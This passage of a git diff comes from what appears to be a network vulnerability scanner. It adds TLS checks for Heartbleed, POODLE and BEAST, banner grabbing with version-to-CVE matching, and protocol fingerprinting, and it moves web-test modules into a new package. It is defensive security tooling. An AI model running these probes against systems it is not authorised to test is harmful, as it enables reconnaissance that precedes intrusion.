tokens, and passwords.", + evidence=f"Heartbeat response ({resp_payload_len} bytes) exceeded request size.", + remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", + owasp_id="A06:2021", + cwe_id="CWE-126", + confidence="certain", + ) + except Exception: + pass + return None + + def _tls_check_downgrade(self, target, port): + """Test for TLS downgrade vulnerabilities (POODLE, BEAST). + + Returns list of findings. 
+ """ + findings = [] + + # --- POODLE: Test SSLv3 acceptance --- + try: + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + ctx.maximum_version = ssl.TLSVersion.SSLv3 + ctx.minimum_version = ssl.TLSVersion.SSLv3 + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + tls_sock = ctx.wrap_socket(sock, server_hostname=target) + negotiated = tls_sock.version() + tls_sock.close() + if negotiated and "SSL" in negotiated: + findings.append(Finding( + severity=Severity.HIGH, + title="Server accepts SSLv3 — vulnerable to POODLE (CVE-2014-3566)", + description=f"TLS on {target}:{port} accepts SSLv3 connections. " + "The POODLE attack allows decrypting SSLv3 traffic using CBC cipher padding oracles.", + evidence=f"Negotiated {negotiated} when SSLv3 was forced.", + remediation="Disable SSLv3 entirely on the server.", + owasp_id="A02:2021", + cwe_id="CWE-757", + confidence="certain", + )) + except (ssl.SSLError, OSError): + pass # SSLv3 rejected or not available in runtime — good + + # --- BEAST: Test TLS 1.0 with CBC cipher --- + try: + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + ctx.maximum_version = ssl.TLSVersion.TLSv1 + ctx.minimum_version = ssl.TLSVersion.TLSv1 + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + tls_sock = ctx.wrap_socket(sock, server_hostname=target) + negotiated = tls_sock.version() + cipher_info = tls_sock.cipher() + tls_sock.close() + if negotiated and cipher_info: + cipher_name = cipher_info[0] if cipher_info else "" + if "CBC" in cipher_name.upper(): + findings.append(Finding( + severity=Severity.MEDIUM, + title="TLS 1.0 with CBC cipher — BEAST risk (CVE-2011-3389)", + description=f"TLS on {target}:{port} accepts TLS 1.0 with CBC-mode cipher '{cipher_name}'. 
" + "The BEAST attack exploits predictable IVs in TLS 1.0 CBC mode.", + evidence=f"Negotiated {negotiated} with cipher {cipher_name}.", + remediation="Disable TLS 1.0 or ensure only non-CBC ciphers are used with TLS 1.0.", + owasp_id="A02:2021", + cwe_id="CWE-327", + confidence="certain", + )) + except (ssl.SSLError, OSError): + pass # TLS 1.0 rejected — good + + return findings + + # Product patterns for generic banner version extraction. + # Maps regex → CVE DB product name. Each regex must have a named group 'ver'. + _GENERIC_BANNER_PATTERNS = [ + (_re.compile(r'OpenSSH[_\s](?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "openssh"), + (_re.compile(r'Apache[/ ](?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "apache"), + (_re.compile(r'nginx[/ ](?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "nginx"), + (_re.compile(r'Exim\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "exim"), + (_re.compile(r'Postfix[/ ]?(?:.*?smtpd)?\s*(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "postfix"), + (_re.compile(r'ProFTPD\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "proftpd"), + (_re.compile(r'vsftpd\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "vsftpd"), + (_re.compile(r'Redis[/ ](?:server\s+)?v?(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "redis"), + (_re.compile(r'Samba\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "samba"), + (_re.compile(r'Asterisk\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "asterisk"), + (_re.compile(r'MySQL[/ ](?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "mysql"), + (_re.compile(r'PostgreSQL\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "postgresql"), + (_re.compile(r'MongoDB\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "mongodb"), + (_re.compile(r'Elasticsearch[/ ](?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "elasticsearch"), + (_re.compile(r'memcached\s+(?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "memcached"), + (_re.compile(r'TightVNC[/ ](?P<ver>\d+\.\d+(?:\.\d+)?)', _re.I), "tightvnc"), + ] + + def _service_info_generic(self, target, port): + """ + Attempt a generic TCP banner grab for uncovered ports. + + Performs three checks on the banner: + 1. Version disclosure — flags any product/version string as info leak. + 2. 
CVE matching — runs extracted versions against the CVE database. + 3. Unauthenticated data exposure — flags services that send data + without any client request (potential auth bypass). + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + raw_bytes = sock.recv(512) + sock.close() + if not raw_bytes: + return None + except Exception as e: + return probe_error(target, port, "generic", e) + + # --- Protocol fingerprinting: detect known services on non-standard ports --- + reclassified = self._generic_fingerprint_protocol(raw_bytes, target, port) + if reclassified is not None: + return reclassified + + # --- Standard banner analysis for truly unknown services --- + data = raw_bytes.decode('utf-8', errors='ignore') + banner = ''.join(ch if 32 <= ord(ch) < 127 else '.' for ch in data) + readable = banner.strip().replace('.', '') + if not readable: + return None + raw["banner"] = banner.strip() + banner_text = raw["banner"] + + # --- 1. Version extraction + CVE check --- + for pattern, product in self._GENERIC_BANNER_PATTERNS: + m = pattern.search(banner_text) + if m: + version = m.group("ver") + raw["product"] = product + raw["version"] = version + findings.append(Finding( + severity=Severity.LOW, + title=f"Service version disclosed: {product} {version}", + description=f"Banner on {target}:{port} reveals {product} {version}. 
" + "Version disclosure aids attackers in targeting known vulnerabilities.", + evidence=f"Banner: {banner_text[:80]}", + remediation="Suppress or genericize the service banner.", + cwe_id="CWE-200", + confidence="certain", + )) + findings += check_cves(product, version) + break # First match wins + + return probe_result(raw_data=raw, findings=findings) + + # Protocol signatures for reclassifying services on non-standard ports. + # Each entry: (check_function, protocol_name, probe_method_name) + # Check functions receive raw bytes and return True if matched. + @staticmethod + def _is_redis_banner(data): + """Redis RESP: starts with +, -, :, $, or * (protocol type bytes).""" + return len(data) > 0 and data[0:1] in (b'+', b'-', b'$', b'*', b':') + + @staticmethod + def _is_ftp_banner(data): + """FTP: 220 greeting.""" + return data[:4] in (b'220 ', b'220-') + + @staticmethod + def _is_smtp_banner(data): + """SMTP: 220 greeting with SMTP/ESMTP keyword.""" + text = data[:200].decode('utf-8', errors='ignore').upper() + return text.startswith('220') and ('SMTP' in text or 'ESMTP' in text) + + @staticmethod + def _is_mysql_handshake(data): + """MySQL: 3-byte length + seq + protocol version 0x0a.""" + if len(data) > 4: + payload = data[4:] + return payload[0:1] == b'\x0a' + return False + + @staticmethod + def _is_rsync_banner(data): + """Rsync: @RSYNCD: version.""" + return data.startswith(b'@RSYNCD:') + + @staticmethod + def _is_telnet_banner(data): + """Telnet: IAC (0xFF) followed by WILL/WONT/DO/DONT.""" + return len(data) >= 2 and data[0] == 0xFF and data[1] in (0xFB, 0xFC, 0xFD, 0xFE) + + _PROTOCOL_SIGNATURES = None # lazy init to avoid forward reference issues + + def _generic_fingerprint_protocol(self, raw_bytes, target, port): + """Try to identify the protocol from raw banner bytes. + + If a known protocol is detected, reclassifies the port and runs the + appropriate specialized probe directly. 
+ + Returns + ------- + dict or None + Probe result from the specialized probe, or None if no match. + """ + signatures = [ + (self._is_redis_banner, "redis", "_service_info_redis"), + (self._is_ftp_banner, "ftp", "_service_info_ftp"), + (self._is_smtp_banner, "smtp", "_service_info_smtp"), + (self._is_mysql_handshake, "mysql", "_service_info_mysql"), + (self._is_rsync_banner, "rsync", "_service_info_rsync"), + (self._is_telnet_banner, "telnet", "_service_info_telnet"), + ] + + for check_fn, proto, method_name in signatures: + try: + if check_fn(raw_bytes): + # Reclassify port protocol for future reference + port_protocols = self.state.get("port_protocols", {}) + old_proto = port_protocols.get(port, "unknown") + port_protocols[port] = proto + self.P(f"Protocol reclassified: port {port} {old_proto} → {proto} (banner fingerprint)") + + # Run the specialized probe directly + probe_fn = getattr(self, method_name, None) + if probe_fn: + return probe_fn(target, port) + except Exception: + continue + return None diff --git a/extensions/business/cybersec/red_mesh/worker/web/__init__.py b/extensions/business/cybersec/red_mesh/worker/web/__init__.py new file mode 100644 index 00000000..0db9a024 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/web/__init__.py @@ -0,0 +1,14 @@ +from .discovery import _WebDiscoveryMixin +from .hardening import _WebHardeningMixin +from .api_exposure import _WebApiExposureMixin +from .injection import _WebInjectionMixin + + +class _WebTestsMixin( + _WebDiscoveryMixin, + _WebHardeningMixin, + _WebApiExposureMixin, + _WebInjectionMixin, +): + """Combined web tests mixin.""" + pass diff --git a/extensions/business/cybersec/red_mesh/web_api_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/api_exposure.py similarity index 99% rename from extensions/business/cybersec/red_mesh/web_api_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/api_exposure.py index a0aef396..0e3f18b0 100644 --- 
a/extensions/business/cybersec/red_mesh/web_api_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/api_exposure.py @@ -1,6 +1,6 @@ import requests -from .findings import Finding, Severity, probe_result, probe_error +from ...findings import Finding, Severity, probe_result, probe_error class _WebApiExposureMixin: diff --git a/extensions/business/cybersec/red_mesh/web_discovery_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/discovery.py similarity index 99% rename from extensions/business/cybersec/red_mesh/web_discovery_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/discovery.py index e2c50fc8..7b607308 100644 --- a/extensions/business/cybersec/red_mesh/web_discovery_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/discovery.py @@ -2,8 +2,8 @@ import uuid as _uuid import requests -from .findings import Finding, Severity, probe_result, probe_error -from .cve_db import check_cves +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves class _WebDiscoveryMixin: diff --git a/extensions/business/cybersec/red_mesh/web_hardening_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/hardening.py similarity index 99% rename from extensions/business/cybersec/red_mesh/web_hardening_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/hardening.py index de71f85f..1c085fad 100644 --- a/extensions/business/cybersec/red_mesh/web_hardening_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/hardening.py @@ -4,7 +4,7 @@ import requests from urllib.parse import quote -from .findings import Finding, Severity, probe_result, probe_error +from ...findings import Finding, Severity, probe_result, probe_error class _WebHardeningMixin: diff --git a/extensions/business/cybersec/red_mesh/web_injection_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/injection.py similarity index 99% rename from 
extensions/business/cybersec/red_mesh/web_injection_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/injection.py index f5a77baa..f857b69b 100644 --- a/extensions/business/cybersec/red_mesh/web_injection_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/injection.py @@ -3,7 +3,7 @@ import requests from urllib.parse import quote -from .findings import Finding, Severity, probe_result, probe_error +from ...findings import Finding, Severity, probe_result, probe_error class _InjectionTestBase: